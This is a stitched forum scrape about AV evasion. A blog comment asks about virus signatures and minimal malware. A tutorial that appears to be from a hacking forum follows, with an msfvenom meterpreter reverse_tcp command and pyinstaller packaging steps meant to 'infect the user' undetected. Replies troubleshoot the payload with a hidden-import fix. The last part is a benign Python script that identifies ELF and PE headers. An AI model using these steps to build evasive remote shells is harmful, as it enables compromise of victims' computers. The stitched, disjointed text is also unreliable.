Jan, hi – this is ChittahChattah – I just posted on your RSA hack blog post. I am now posting to ask your opinion on 2 issues w.r.t. your above blog: 1) If I were to detect a virus or malware attached to a packet, I am wondering what sequence of hex I would look for.
I imagine that there must be some very telltale sequence of opcodes or similar in hex. I took your virus code from GitHub, edited out your comments, and converted it into hex. It ended up 6,327 bytes; I then tried to mask it with a variety of x86 and ARM opcodes, but could not discern anything. This is because you did not rely upon opcodes for your ELF virus. 2) In your opinion, what is the shortest/smallest virus/malware code possible? The code does not necessarily need to manipulate data or replicate – only to insert bad data randomly in a database, for example. Thx much – I really enjoy your blog about your youth, and then about Obama logic.
Sorry you have not been posting since Feb 2018 – I hope you get my mail.
Hello everyone, this is my first post so play nice with me. We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes. Henceforth, what I mean by undetectable is that it is undetected by 0 antivirus. Trust me, I've tried and it's possible. But you ask, how is this possible?

Let me explain how AVs detect threats in quick and simple language. When you scan an .exe or any other file, it doesn't scan the actual code for bad stuff. It copies the signature and searches its database to see whether it's a threat or not. Simple. Typically many new executables aren't detected until it's too late. So, how do we change the signature, how do we infect the user? Let's do this!

Note: All tools used were used under a fresh Kali system, meaning that all tools are already preinstalled.

Step 1: Boot Up Kali and Create a Basic Executable

First we need to create a basic script from msfvenom to make the executable. Do the command:

msfvenom -p python/meterpreter/reverse_tcp LHOST=ANYIP LPORT=ANYPORT R > anyname.py

Here is mine. As you can see, it dramatically increased the size of the code. Save it now.
How To Program A Virus
Step 3: Convert It into an Executable EXE

Now, unless you are attacking a Windows-based client there is no need for this. Linux has built-in Python support (at least to some extent). Mac has built-in Python support. Windows doesn't, and the average consumer doesn't install Python on their computer. So what do we do? Make it into an .exe executable. Run the command:

pyinstaller 'Your .py file here'

That's it! Wait for it to finish. Once it's finished it will place it in a specific directory. Usually it's in /root/dist/name of your file/.

Step 4: Testing the Executable Against the AV

Naturally this isn't a good idea because many AVs use VirusTotal to see new viruses. But it is perfect because a computer can never outsmart an always-changing virus. So take your .exe file and scan it!
That will be impractical, slow and almost impossible. Most executables are encrypted to protect against people copying and pasting them. AVs don't have a human brain, meaning that they can't scan code and say 'Wait, the code looks really sketchy. I'm removing it.' But where AVs shine is the removal process. Once the AV finds it, you're probably dead meat; I've had scenarios where Malwarebytes caught me but I killed it just in time. Anyway, most users don't need an anti-virus, just don't install sketchy programs.

It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using extracted code patterns from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it and it may potentially be seen as suspicious.
If enough flags are raised, the file in question will be labelled as malicious depending on the level of sensitivity set in the AV. So in a sense, you could say that an AV knows whether a file is suspicious or not.

P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the VirusTotal scan. Maybe this worked when the tutorial came out, but now it definitely doesn't.
It might be a good idea to tell everyone that in order to make a Windows executable, pyinstaller needs to run on Windows. By running pyinstaller on Linux, it makes a Linux executable, which could be the reason a lot of people are getting an error that the program can't run on your PC.
And it's the reason that it's not detected on VirusTotal - most AVs only support Windows executables. Another issue is that you don't actually test the payload. I found that when executing this and it connects, you will get an error saying something like 'This script cannot run' (I forgot what the exact error was). I ran it in debug mode, and apparently it was failing a bit of code in the stage (All the code can be seen ). If you look at line 19, you see the code is import ctypes. The error I was getting said it couldn't import ctypes, because it threw a NameError. The solution for this is adding a bit of code to the pyinstaller command: pyinstaller --hidden-import ctypes yourscript.py. Now the session is created successfully, but there are some commands missing, and others like shell don't work.
This is not a very elegant solution.
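Two replies above make the same point: the scanned file was reported as ELF64 rather than a Windows PE because pyinstaller built it on Linux, which also explains why Windows-only engines had nothing to say about it. The following is an added example, not code from this thread, that reads a file header the way a scanner or triage script does and reports the container format; the sample headers are constructed minimal stubs, not real programs.

```python
import struct

# Constructed sample headers (not runnable programs): just enough bytes for the format checks.
SAMPLE_ELF64 = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # EI_CLASS=2 means 64-bit
SAMPLE_ELF32 = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # EI_CLASS=1 means 32-bit
SAMPLE_SCRIPT = b"#!/usr/bin/env python3\nprint('hi')\n"        # plain text, no binary header


def _fake_pe(opt_magic: int) -> bytes:
    """Build a minimal PE skeleton: MZ stub, e_lfanew at 0x3C, 'PE\\0\\0', COFF header, optional-header magic."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\x00" * (e_lfanew - 2))
    dos[0x3C:0x40] = struct.pack("<I", e_lfanew)          # pointer to the PE signature
    machine = 0x8664 if opt_magic == 0x20B else 0x14C      # AMD64 vs i386
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, 0)  # 20-byte COFF file header
    return bytes(dos) + b"PE\x00\x00" + coff + struct.pack("<H", opt_magic)


SAMPLE_PE32PLUS = _fake_pe(0x20B)   # 64-bit Windows executable
SAMPLE_PE32 = _fake_pe(0x10B)       # 32-bit Windows executable


def identify_executable(data: bytes) -> str:
    """Return the container format a scanner sees: ELF32/ELF64, PE32/PE32+, or 'unknown'."""
    # ELF: 0x7f 'E' 'L' 'F', then EI_CLASS selects 32- or 64-bit layout.
    if data[:4] == b"\x7fELF" and len(data) > 4:
        return {1: "ELF32", 2: "ELF64"}.get(data[4], "ELF (bad class)")
    # PE: 'MZ' DOS stub, e_lfanew (u32 LE at 0x3C) points at 'PE\0\0',
    # and the optional header's magic (24 bytes past the signature) gives PE32 vs PE32+.
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00" and len(data) >= e_lfanew + 26:
            magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
            return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE (unknown magic)")
        return "MZ stub without PE header"
    return "unknown"


def identify_file(path: str) -> str:
    """Convenience wrapper: classify a file on disk from its first few hundred bytes."""
    with open(path, "rb") as fh:
        return identify_executable(fh.read(512))


if __name__ == "__main__":
    for name, blob in [("elf64", SAMPLE_ELF64), ("pe32+", SAMPLE_PE32PLUS), ("script", SAMPLE_SCRIPT)]:
        print(f"{name}: {identify_executable(blob)}")
```

Running it over a pyinstaller output built on Linux reports ELF64 (or ELF32), which is the quickest way to confirm the reply's explanation before wondering why Windows AV engines stayed quiet.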